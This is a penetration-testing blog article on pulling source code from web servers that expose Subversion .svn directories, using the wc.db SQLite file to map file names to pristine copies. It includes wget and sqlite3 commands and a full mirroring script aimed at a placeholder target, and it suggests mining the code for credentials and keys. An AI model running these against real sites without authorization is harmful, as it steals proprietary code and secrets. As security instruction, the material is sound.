[Editor's Note: Here is a delightful little article from my buddy, Tim Medin, on recovering Subversion-related files during a penetration test or ethical hacking project. Recently, we've had several projects in which this hot little technique has been vitally important, yielding super cool information for us. -Ed.]
Give me a Dot. Give me an S. Give me a V. Give me an N. Give me source code!
I think most Web Application Penetration Testers would agree that source code access makes finding vulnerabilities faster and more accurate. Sadly, many times we don't have access to the source code. Fortunately for us pen testers, admins and developers can inadvertently leave the code around for us.
Many times, when code is moved into production, the source directory will be zipped/tarred/rarred/whatevs-ed and uploaded to the server. Other times, a copy of the code is checked out straight from the repository. If either method is done incorrectly, unneeded repository files will be left on the production server. We can use this to our advantage to snag some righteous code.
In Subversion 1.6 (and earlier), you could list everything under source control by looking at the aptly named "entries" file, located at .svn/entries. This file contains the names of the files and directories under source control in that directory. Because each directory has its own .svn directory, you needed to walk the entire tree, reading each directory's entries file, to enumerate all the files. Once armed with that information, you could access the source of each file in the corresponding .svn/text-base directory.
If, for example, the site exposes its .svn directories and has an index.php file, the source can be accessed via http://somedomain.com/.svn/text-base/index.php.svn-base. Sadly, many times the web server will detect the .php in the file name, even though it isn't at the end, and execute the file instead of displaying the source. Of course, we want to see the source. Fortunately, the newer versions of the Subversion client help us out.
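Before moving on, the 1.6 layout described above can be sketched in a few lines of shell. This is only an illustration: text_base_url is a hypothetical helper name, and it assumes the working copy root is served at the base URL you pass in. It shows that every directory carries its own .svn/text-base, so a file in a subdirectory is found under that subdirectory's .svn.

```shell
#!/bin/sh
# Hypothetical helper (not part of any tool): map a working-copy path to the
# URL of its pristine copy in a Subversion <= 1.6 layout, where each
# directory has its own .svn/text-base directory.
text_base_url() (
    base="${1%/}"              # strip one trailing slash from the base URL
    path="$2"
    file="${path##*/}"         # last path component, e.g. menu.js
    case "$path" in
        */*) dir="${path%/*}/" ;;   # containing directory, e.g. scripts/
        *)   dir="" ;;              # file sits in the working copy root
    esac
    printf '%s/%s.svn/text-base/%s.svn-base\n' "$base" "$dir" "$file"
)

text_base_url http://somedomain.com index.php
text_base_url http://somedomain.com scripts/menu.js
```

The first call reproduces the URL from the example above; the second shows where a file one directory down would live.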
With Subversion 1.7 and later, a new SQLite database is used to condense a lot of the information into one place. The SQLite database file is located at .svn/wc.db. Once you download that file using a tool such as wget (or even your browser), you can see the entire contents of the database using the following command:
$ sqlite3 wc.db .dump
Likely this will show us too much information and it won't be in a format we can easily parse, so let's look at the new file structure and figure out what we need to extract from the database.
In Subversion 1.7 (and presumably future versions), the directory structure is quite flat. Instead of each directory containing its own .svn directory and pristine files, all the files are stored under a single top-level .svn directory, at paths similar to .svn/pristine/00/001761b07f92b4c9053ce2878cc338b8e06fc3a7.svn-base. The basename is the SHA1 of the file's contents and the parent directory is the first two characters of that SHA1. It isn't immediately clear which human readable file name maps to which SHA1. Fortunately, the database contains this mapping. Let's take a look at how we can find this information.
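As a small sketch of that naming rule, the function below turns a SHA1 hex digest into its pristine path. The name pristine_path is hypothetical, chosen only for illustration; the digest used in the call is the one from the example path above.

```shell
#!/bin/sh
# Hypothetical helper: build the .svn/pristine path for a SHA1 hex digest.
# The first two hex characters of the digest name the subdirectory.
pristine_path() (
    sha="$1"
    prefix=$(printf '%.2s' "$sha")   # first two characters of the digest
    printf '.svn/pristine/%s/%s.svn-base\n' "$prefix" "$sha"
)

pristine_path 001761b07f92b4c9053ce2878cc338b8e06fc3a7
```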
We can browse the database using the .tables command. In the output, we see the table we want: NODES.
$ sqlite3 wc.db .tables
ACTUAL_NODE    NODES          PRISTINE       WC_LOCK
EXTERNALS      NODES_BASE     REPOSITORY     WORK_QUEUE
LOCK           NODES_CURRENT  WCROOT
Let's take a deeper look at the NODES table. To see its structure, we can use the .schema command and a little grep-fu.
$ sqlite3 wc.db .schema | grep NODES
(output condensed)
CREATE TABLE NODES (
  wc_id INTEGER NOT NULL REFERENCES WCROOT (id),
  local_relpath TEXT NOT NULL,
  ...
  checksum TEXT REFERENCES PRISTINE (checksum),
  ...
);
After looking at the table structure, the data, and the file system, we see two columns in the NODES table that we can use to re-create the file path: local_relpath and checksum.
$ sqlite3 wc.db 'select local_relpath, checksum from NODES'
index.php|$sha1$4e6a225331f9ae872db25a8f85ae7be05cea6d51
scripts/menu.js|$sha1$fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf
style/style.js|$sha1$2cc5590e0ba024c3db77a13896da09b39ea74799
...
We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion.
$ sqlite3 wc.db "select local_relpath, '.svn/pristine/' || substr(checksum,7,2) || '/' || substr(checksum,7) || '.svn-base' as alpha from NODES;"
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2c/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base
...
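The double pipe (||) is the concatenation operator and is used to combine our strings. We can use substr to chop the checksum column and extract the information we need: the value starts with the six-character prefix $sha1$, so the hex digest begins at position 7. substr(checksum,7,2) returns the first two characters of the digest (the directory name), and substr(checksum,7) returns the whole digest (the file name). Ultimately, we end up with the file names as shown above.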
We can then use these paths to access the files on the server, and we don't have to deal with the pesky .php in the file name, so we should be able to view the source. Here is an example scenario:
$ wget http://www.sometarget.tgt/.svn/wc.db
$ sqlite3 wc.db "select local_relpath, '.svn/pristine/' || substr(checksum,7,2) || '/' || substr(checksum,7) || '.svn-base' as alpha from NODES;"
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
...
$ wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
<?php
// This is the index.php file
...
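The scenario above fetches one file by hand. A rough sketch of automating it for every row in NODES follows. The names fetch_plan and mirror_site are hypothetical, and the script assumes wget and the sqlite3 command-line tool are installed, that sqlite3 uses its default | column separator, and that no file name contains a | or a newline. Rows without a checksum (directories, for example) come back with an empty second column and are skipped.

```shell
#!/bin/sh
# Sketch only: fetch_plan and mirror_site are hypothetical helper names.

# Read "local_relpath|$sha1$<hex>" rows on stdin and print
# "<pristine URL><TAB><local_relpath>" for every row that has a checksum.
fetch_plan() (
    base="${1%/}"
    while IFS='|' read -r relpath checksum; do
        case "$checksum" in
            '$sha1$'?*) ;;        # files carry a $sha1$-prefixed checksum
            *) continue ;;        # rows with no checksum are skipped
        esac
        sha=${checksum#'$sha1$'}            # drop the six-character prefix
        prefix=$(printf '%.2s' "$sha")      # first two hex chars = directory
        printf '%s/.svn/pristine/%s/%s.svn-base\t%s\n' \
            "$base" "$prefix" "$sha" "$relpath"
    done
)

# Download wc.db, then save each pristine file under outdir using its
# original name. Only run this against targets that are in scope.
mirror_site() (
    base="${1%/}"
    outdir="$2"
    wget -q -O wc.db "$base/.svn/wc.db" || exit 1
    sqlite3 wc.db 'select local_relpath, checksum from NODES' |
        fetch_plan "$base" |
        while IFS="$(printf '\t')" read -r url relpath; do
            case "$relpath" in
                /*|*..*) continue ;;   # conservative: never write outside outdir
            esac
            mkdir -p "$outdir/$(dirname "$relpath")"
            wget -q -O "$outdir/$relpath" "$url"
        done
)
```

Nothing runs until mirror_site is called, so the plan can be inspected first by piping the sqlite3 output through fetch_plan alone. A full run against the example target might look like this:

$ mirror_site http://www.sometarget.tgt ./source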
Of course, just having all the source code means someone could completely copy the site, but we can also search the code for inline SQL, database credentials, encryption keys, or other sensitive information. Cool! And Hot.